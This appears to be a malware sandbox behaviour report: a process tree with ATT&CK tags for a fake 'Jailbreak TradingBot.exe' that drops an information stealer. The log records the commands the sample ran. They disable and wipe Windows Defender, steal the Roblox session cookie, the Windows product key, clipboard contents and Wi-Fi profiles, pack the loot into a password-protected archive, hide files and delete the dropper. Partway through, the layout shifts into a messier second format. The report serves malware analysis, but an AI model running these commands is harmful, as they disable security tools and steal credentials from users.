        PID 768: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"
          PID 5704: taskkill /F /PID 1944  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 6084: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"
          PID 5556: taskkill /F /PID 1944  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5396: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"
          PID 5228: taskkill /F /PID 4528  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 2852: C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"
          PID 6120: taskkill /F /PID 4528  (image: C:\Windows\system32\taskkill.exe)
            - Kills process with taskkill
        PID 5224: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          PID 5188: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
        PID 5492: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          PID 5580: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Suspicious behavior: EnumeratesProcesses
        PID 416: C:\Windows\system32\cmd.exe /c "getmac"
          PID 5236: getmac  (image: C:\Windows\system32\getmac.exe)
        PID 2716: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *"
          PID 5676: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID 5884: C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *
            - Executes dropped EXE
        PID 5860: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          PID 4148: wmic os get Caption  (image: C:\Windows\System32\Wbem\WMIC.exe)
        PID 4276: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          PID 6120: wmic computersystem get totalphysicalmemory  (image: C:\Windows\System32\Wbem\WMIC.exe)
        PID 5400: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          PID 6056: wmic csproduct get uuid  (image: C:\Windows\System32\Wbem\WMIC.exe)
        PID 5288: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
          PID 4228: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
        PID 5128: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          PID 4828: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
            - Detects videocard installed
        PID 3136: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
          PID 2592: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
            - Suspicious behavior: EnumeratesProcesses
        PID 3936: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""
          - System Network Configuration Discovery: Internet Connection Discovery
          PID 3892: ping localhost -n 3  (image: C:\Windows\system32\PING.EXE)
            - System Network Configuration Discovery: Internet Connection Discovery
            - Runs ping.exe
  PID 5844: "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
    - Checks computer location settings
    - Executes dropped EXE
    PID 5936: "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    PID 6024: "C:\Users\Admin\AppData\Roaming\Built.exe"
      - Executes dropped EXE
      PID 5244: "C:\Users\Admin\AppData\Roaming\Built.exe"
        - Executes dropped EXE
        - Loads dropped DLL
PID 1808: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 1812: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 2288: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
PID 5996: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
PID 6024: C:\Windows\System32\sihclient.exe /cv uoA8EPR7jEGXyNrqurEFYw.0.2
PID 5156: C:\Users\Admin\AppData\Roaming\XClient.exe
  - Executes dropped EXE
PID 3532: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID 5700: "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  - Checks computer location settings
  - Executes dropped EXE
  PID 5704: "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
    - Executes dropped EXE
  PID 5680: "C:\Users\Admin\AppData\Roaming\Built.exe"
    - Executes dropped EXE
    PID 5304: "C:\Users\Admin\AppData\Roaming\Built.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      PID 6052: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
        PID 5380: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      PID 5160: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        PID 4372: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      PID 5648: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 2720: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 1036: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        PID 5952: wmic csproduct get uuid  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 4976: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        PID 5448: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2  (image: C:\Windows\system32\reg.exe)
      PID 5232: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        PID 2436: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2  (image: C:\Windows\system32\reg.exe)
      PID 5056: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID 3860: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
          - Detects videocard installed
      PID 3752: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID 1700: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
          - Detects videocard installed
      PID 3664: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
        - Hide Artifacts: Hidden Files and Directories
        PID 1536: attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"  (image: C:\Windows\system32\attrib.exe)
          - Views/modifies file attributes
      PID 2080: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 5588: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 2712: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 768: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 5140: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        PID 5904: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 3968: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        - Clipboard Data
        PID 220: powershell Get-Clipboard  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Clipboard Data
          - Suspicious behavior: EnumeratesProcesses
      PID 2976: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 5852: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 5788: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 5172: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 3312: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        - System Network Configuration Discovery: Wi-Fi Discovery
        PID 5700: netsh wlan show profile  (image: C:\Windows\system32\netsh.exe)
          - Event Triggered Execution: Netsh Helper DLL
          - System Network Configuration Discovery: Wi-Fi Discovery
      PID 4652: C:\Windows\system32\cmd.exe /c "systeminfo"
        PID 5372: systeminfo  (image: C:\Windows\system32\systeminfo.exe)
          - Gathers system information
      PID 5812: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        PID 5500: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath  (image: C:\Windows\system32\reg.exe)
      PID 5404: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 5988: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 5864: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        PID 2716: attrib -r C:\Windows\System32\drivers\etc\hosts  (image: C:\Windows\system32\attrib.exe)
          - Drops file in Drivers directory
          - Views/modifies file attributes
      PID 2220: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 5596: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 5296: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        PID 1932: attrib +r C:\Windows\System32\drivers\etc\hosts  (image: C:\Windows\system32\attrib.exe)
          - Drops file in Drivers directory
          - Views/modifies file attributes
      PID 3492: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 3916: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 5664: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 6120: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 5160: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 6092: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 416: C:\Windows\system32\cmd.exe /c "tree /A /F"
        PID 5884: tree /A /F  (image: C:\Windows\system32\tree.com)
      PID 3244: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        PID 4980: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      PID 4536: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        PID 5704: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Suspicious behavior: EnumeratesProcesses
      PID 3372: C:\Windows\system32\cmd.exe /c "getmac"
        PID 3808: getmac  (image: C:\Windows\system32\getmac.exe)
      PID 5744: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *"
        PID 1884: C:\Users\Admin\AppData\Local\Temp\_MEI56802\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\j2WLE.zip" *
          - Executes dropped EXE
      PID 2660: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        PID 5168: wmic os get Caption  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 6028: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        PID 1868: wmic computersystem get totalphysicalmemory  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 1408: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        PID 640: wmic csproduct get uuid  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 432: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        PID 4848: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      PID 5940: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID 1748: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
          - Detects videocard installed
      PID 1560: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        PID 4780: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Suspicious behavior: EnumeratesProcesses
      PID 5288: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""
        - System Network Configuration Discovery: Internet Connection Discovery
        PID 3860: ping localhost -n 3  (image: C:\Windows\system32\PING.EXE)
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
PID 1224: C:\Windows\system32\svchost.exe -k SDRSVC
PID 372: "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  - Checks computer location settings
  - Executes dropped EXE
  PID 5652: "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
    - Executes dropped EXE
  PID 5512: "C:\Users\Admin\AppData\Roaming\Built.exe"
    - Executes dropped EXE
    PID 1876: "C:\Users\Admin\AppData\Roaming\Built.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      PID 4692: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
        PID 600: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
      PID 5992: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        PID 2168: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend  (image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
          - Command and Scripting Interpreter: PowerShell
      PID 408: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 2660: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 5312: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        PID 5864: wmic csproduct get uuid  (image: C:\Windows\System32\Wbem\WMIC.exe)
      PID 4140: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        PID 5012: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2  (image: C:\Windows\system32\reg.exe)
      PID 5228: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        PID 5104: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2  (image: C:\Windows\system32\reg.exe)
      PID 5560: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID 5736: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
          - Detects videocard installed
      PID 4392: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        PID 3688: wmic path win32_VideoController get name  (image: C:\Windows\System32\Wbem\WMIC.exe)
          - Detects videocard installed
      PID 3632: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
        - Hide Artifacts: Hidden Files and Directories
        PID 768: attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"  (image: C:\Windows\system32\attrib.exe)
          - Views/modifies file attributes
      PID 5224: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        PID 6024: tasklist /FO LIST  (image: C:\Windows\system32\tasklist.exe)
          - Enumerates processes with tasklist
      PID 4592: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:1472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:5844
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
PID:5284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3680
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3488
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1288 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:1252
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:2720
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:4468
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5600
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5780
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6096
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:6028
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1964
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5904
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:656
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
PID:3768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5616
-
C:\Windows\system32\getmac.exegetmac5⤵PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *"4⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI55122\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\8yjmo.zip" *5⤵
- Executes dropped EXE
PID:5156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:3488
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:4084
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5788
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:1076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:4040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:6068
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5264 -
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2780
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵PID:4988
-
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe1⤵
- Executes dropped EXE
PID:2260
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Hide Artifacts (2): Hidden Files and Directories (2)
- Modify Registry (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (3): Credentials In Files (3)
Downloads